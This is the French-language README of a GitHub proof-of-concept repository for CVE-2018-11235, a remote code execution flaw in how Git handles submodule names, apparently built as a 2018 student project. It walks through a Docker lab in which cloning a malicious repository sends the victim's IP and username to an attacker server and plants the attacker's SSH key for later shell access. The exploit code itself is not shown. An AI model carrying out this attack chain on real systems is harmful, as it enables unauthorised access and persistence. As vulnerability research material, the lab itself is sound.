Skip to content

Proof of Concept - RCE Exploitation : Git submodules' names vulnerability - Ensimag November 2018

Notifications You must be signed in to change notification settings

ygouzerh/CVE-2018-11235

Repository files navigation

CVE-2018-11235

Getting started

Pour build les conteneurs dockers, utilisez :

make docker

(Les commandes make suivantes sont à lancer en parallèle sur différents terminaux depuis votre machine)

Pour démarrer le conteneur du serveur attaquant, utilisez :

make run_server

pour démarrer le conteneur représentant la victime, utilisez :

make run_client

Le conteneur va lancer le script client.py. Le script va transmettre son adresse Ip et son nom de utilisateur au pirate.

Suivez les instructions de la console des clients pour cloner le dépôt git malveillant.

git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

Vous constaterez que l'adresse IP et le nom d'utilisateur de la victime sont transmis au serveur.

Après le clone, vérifiez que la clé publique des attaquants est bien ajoutée aux authorized_keys du client.

Ensuite, vous pouvez ouvrir un shell sur le client depuis le serveur, grâce à la commande suivante (à executer sur votre machine):

make server_bash

ssh <transmitted_username>@<transmitted_host>

Questions

Si vous avez quelques problèmes que ce soit pour executer ce Proof of Concept, veuillez créer une issue sur ce dépôt: https://github.com/ygouzerh/CVE-2018-11235/issues , nous vous répondrons le plus rapidement possible.